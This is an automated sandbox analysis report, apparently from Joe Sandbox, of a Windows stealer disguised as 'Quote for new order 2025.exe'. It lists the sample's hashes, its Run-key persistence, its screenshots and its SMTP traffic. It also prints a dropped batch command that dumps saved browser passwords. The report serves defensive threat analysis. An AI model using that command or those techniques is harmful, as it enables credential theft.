                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                            Warnings

                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.253.45
                                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                            • VT rate limit hit for: Quote for new order 2025.exe

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            16:56:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Application C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                            16:56:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Application C:\Users\user\Desktop\Quote for new order 2025.exe

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            No context

                                                                                                                                            Domains

                                                                                                                                            No context

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            NIOBEBILISIMHIZMETLERITRfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 77.245.159.14
                                                                                                                                            fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 77.245.159.14
                                                                                                                                            fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 77.245.159.14
                                                                                                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 77.245.159.27
                                                                                                                                            https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                                                            • 77.245.159.9
                                                                                                                                            PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                            • 77.245.148.65
                                                                                                                                            Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 77.245.159.9
                                                                                                                                            Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 77.245.159.9
                                                                                                                                            https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.phpGet hashmaliciousUnknownBrowse
                                                                                                                                            • 77.245.159.21

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            No context

                                                                                                                                            Dropped Files

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            C:\Users\user\Desktop\Chrom.exe#U0417#U0430#U043f#U0440#U043e#U0441 #U041a#U041f.docx.scrGet hashmaliciousUnknownBrowse
                                                                                                                                              curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                curriculum_vitae-copie_(1).vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                  curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                    UDO_Device_Enrolment.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\Public\Downloads\01-08-2025 11-56-48.jpg

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):94930
                                                                                                                                                      Entropy (8bit):7.831770120257662
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:CrPmU+oyiVAo4U4vXRvy61PXBMiV8FQtTF8CXSd4MwlYE06U3QsQYdVF8XtIb7nG:iPmU+oyiGvymXBVnTkd4MMx0fAsQibPe
                                                                                                                                                      MD5:60EE647BDC5A1BB7107194E644E7DAFA
                                                                                                                                                      SHA1:55D77C1B27DA1D675E3FC8A4380AB70EFC80D221
                                                                                                                                                      SHA-256:800863C7EB04A70D9827908F9CC6C8C5B46FA711BF85DD8E747389894106E4FB
                                                                                                                                                      SHA-512:095B623B1587062CC83F00BD3B5203076B1A9E77DB3B5E3729E4E96751232EAD531E5B53E62F0875EA64F29037475BB011315DED8793D38B95963A88AE364732
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-u>....k..V6....#..e...?)....^~a...b.y.}....G...1.%79.F.....W_.9Z+....]xW.._.1/...G.+.....+..&%........

                                                                                                                                                      C:\Users\Public\Downloads\01-08-2025 11-57-00.jpg

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):107098
                                                                                                                                                      Entropy (8bit):7.813359331794163
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:iPmU+oyiGbJJJJJJJxh61oSTJYI8Srlvh+zskRFxVHv:iOUvG161oSmJSpvh+zRxVHv
                                                                                                                                                      MD5:4C26E553CA78996A0D5FD4A202615D7C
                                                                                                                                                      SHA1:A9B7CEA0B49B8F285672095010652D7ABBD8980F
                                                                                                                                                      SHA-256:E36CEE5E257ED4EBE54861CFA1468D0A0A726C85528B6BA91CAF015F28597275
                                                                                                                                                      SHA-512:3B04B177D228B9AAFFC0D334994141008622FC2A362EBA08F17D21A78C560D28DA9D1FE5E2BB3129F34016EF92A912F768E1FA9BEE6B6B5A9AF6A1615CD3E6C5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-u>....k..V6....#..e...?)....^~a...b.y.}....G...1.%79.F.....W_.9Z+....]xW.._.1/...G.+.....+..&%........

                                                                                                                                                      C:\Users\Public\Downloads\01-08-2025 11-57-08.jpg

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):90930
                                                                                                                                                      Entropy (8bit):7.780603909006165
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:CrP72ZgG8K7hkf2w333333kAnTRKgADdgWEflequnZAR4VpkPGL85wfRB/U7/Oyg:iPyPhkp333333kyvKdueqWAR4TSf4P/L
                                                                                                                                                      MD5:0F312231AA8866F93095F106477F0A11
                                                                                                                                                      SHA1:420C157B6266063692D8B2E27FDF2ADA5DB3D8FF
                                                                                                                                                      SHA-256:2C22A14F2053EBF6EF962BA56924E540B34891907CC56A616D0B9F94B8624590
                                                                                                                                                      SHA-512:151371B9C3B83D723063E805298FC9D9631AEE726643F4FF00E05FDA88BA3601A759C8FEABDFDE0E06EFD7AB5CAF9791EADE035488B4ACD6197CCFA57B725FE3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-u>....k..V6....#..e...?)....^~a...b.y.}....G...1.%79.F.....W_.9Z+....]xW.._.1/...G.+.....+..&%........

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\bhv1FE2.tmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x71e1834d, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20447232
                                                                                                                                                      Entropy (8bit):1.2841567855363691
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:BeUx0oGF76K/OfvWDn2b+Sl5c4FxHoprt:WoGggD8+
                                                                                                                                                      MD5:A9EDC7F53A2D3E2EED81A50292DB552B
                                                                                                                                                      SHA1:1198A665FFACA3DDBC35250A544B091F482193AF
                                                                                                                                                      SHA-256:C5B33E7659706BDAED4823503BC1FB7E0AEDFD8EFFBB3825944E13D274341519
                                                                                                                                                      SHA-512:2A93E249DBC17C6606A02E67C9E6E1F60E173C2D38403170EF24D54AE30FD33FA3BD369D4F855841013A554160421AB8D9AFE67E5213D64EC6C52CF3A56BE2A7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:q.M... ........=......J}...0...{........................"..........{o......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.................................F.<......{.....................s.....{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\bhv428D.tmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xefee132b, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20447232
                                                                                                                                                      Entropy (8bit):1.2841577906876318
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:5eUxKoGF76K/OfvWDn2b+Sl5c4FxHoprt:0oGggD8+
                                                                                                                                                      MD5:9ECBC01A0A684D6CD941983CDBD868B4
                                                                                                                                                      SHA1:BAE56A16D08B2CDB9EB85D130232A3F7F22E28A9
                                                                                                                                                      SHA-256:3617CCD13BE608C5904CC03D58F86C60B21D7AEF9A694B4F1A8D9A4948203FC6
                                                                                                                                                      SHA-512:C0C2446928CBCD208A40C6C4CDB6CADC86DB07DE1EC54A67D8E4F4574629F70D53AED659EBFD5F8A4FD65DA6253D536C87AEDDDC887E3E485E7C8706579A7656
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...+... ........=......J}...0...{........................"..........{o......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................#.".9...}G..................N..58...}y..........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\bhvF18F.tmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):15728640
                                                                                                                                                      Entropy (8bit):0.10805027086476268
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                                                                                                                      MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                                                                                                                      SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                                                                                                                                      SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                                                                                                                      SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\Desktop\Chrom.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):402944
                                                                                                                                                      Entropy (8bit):6.666814366272581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:QNV8uoDRSdm3v93UFlssFHgkU9KvKUXr/BAO9N/oXrsAteTQokizYu:eSDRSm3vrugB9KvKk9RO8k3u
                                                                                                                                                      MD5:2024EA60DA870A221DB260482117258B
                                                                                                                                                      SHA1:716554DC580A82CC17A1035ADD302C0766590964
                                                                                                                                                      SHA-256:53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
                                                                                                                                                      SHA-512:FFCD4436B80169BA18DB5B7C818C5DA71661798963C0A5F5FBAC99A6974A7729D38871E52BC36C766824DD54F2C8FA5711415EC45799DB65C11293D8B829693B
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\Desktop\Chrom.exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: #U0417#U0430#U043f#U0440#U043e#U0441 #U041a#U041f.docx.scr, Detection: malicious, Browse
                                                                                                                                                      • Filename: curriculum_vitae-copie.vbs, Detection: malicious, Browse
                                                                                                                                                      • Filename: curriculum_vitae-copie_(1).vbs, Detection: malicious, Browse
                                                                                                                                                      • Filename: curriculum_vitae-copie.vbs, Detection: malicious, Browse
                                                                                                                                                      • Filename: UDO_Device_Enrolment.exe, Detection: malicious, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................9.......9............... ......................;.......;.......;......Rich............PE..L....hy`.....................P......,i............@..................................................................................@..................................................................................p............................text............................... ..`.rdata..............................@..@.data..............................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\Desktop\output.txt

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..

                                                                                                                                                      C:\Users\user\Desktop\windown.bat

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):33
                                                                                                                                                      Entropy (8bit):3.8013774524295485
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:FnGwOts:ods
                                                                                                                                                      MD5:AB9CCDFF55A9BE4B55EC1560B01447B5
                                                                                                                                                      SHA1:DBF1A7C20E78B1156BA5A1F4F9F45757582D7542
                                                                                                                                                      SHA-256:2B90B9D067A6EA1795075872E83A75DDC2B69A59F51D004DFF13ED97693AF18B
                                                                                                                                                      SHA-512:5966B3B8E2F20699DFBD9CC7B26B2450BE4313CE264A43342D975420662C8614B3F0EA0230ABB63CAF2BC003921CCF168EA4C6BD09A8B9179DA62B71549C569D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.\Chrom.exe /stext .\output.txt..

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):6.993617871655389
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.65%
                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                      • InstallShield setup (43055/19) 0.21%
                                                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                      File name:Quote for new order 2025.exe
                                                                                                                                                      File size:543'744 bytes
                                                                                                                                                      MD5:11de9d1bb135adb354e26bdad47037c9
                                                                                                                                                      SHA1:5fbeaf0df88266d5562da5c5f28ccd80e08f349b
                                                                                                                                                      SHA256:9285b4abeb09d675bc06b47444261c1f0034613d08b44b69c99c8ef63b1cfa72
                                                                                                                                                      SHA512:06c81c0bd9a7fad58c35cc608deb8e9c9cd1adebff271df9f4be1038cac104a9521dbb13bb0e4941795400c47bb35476ac9596928daf57d677270958e9a7731b
                                                                                                                                                      SSDEEP:12288:rIsTP2PSDRSm3vrugB9KvKk9RO8k3hTP2:tTuPS53v6gByKk9ROHhTu
                                                                                                                                                      TLSH:B7C4BF02F3D18036E5AB013207BA6772DEF6BE201635D6670BC51A89AE715D1EB3E743
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."S..........."...P.................. ........@.. ....................................`................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:71716ccc9e15152b

                                                                                                                                                      Static PE Info

                                                                                                                                                      General

                                                                                                                                                      Entrypoint:0x47ccde
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0xBB5322FD [Sat Aug 3 20:37:17 2069 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                      Entrypoint Preview

                                                                                                                                                      Instruction
                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                      Data Directories

                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7cc8c0x4f.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x98d8.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x7cbf00x38.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                      Sections

                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x20000x7ace40x7ae006403e7681c4382fd760e67f120021b85False0.6112168584689726data6.87952860455371IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0x7e0000x98d80x9a00505e1cfe1d7e64c9606199aa8ae2319dFalse0.9738484172077922data7.938275905610368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0x880000xc0x200ceabe85b151fe5a9bee0f5306c78aaa1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                      Resources

                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                      RT_ICON0x7e0c80x94c4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9944858733326332
                                                                                                                                                      RT_GROUP_ICON0x8759c0x14data1.1
                                                                                                                                                      RT_VERSION0x875c00x314data0.4352791878172589

                                                                                                                                                      Imports

                                                                                                                                                      DLLImport
                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 8, 2025 17:56:49.862145901 CET49733587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:56:49.866961002 CET5874973377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:56:49.867024899 CET49733587192.168.2.477.245.158.126
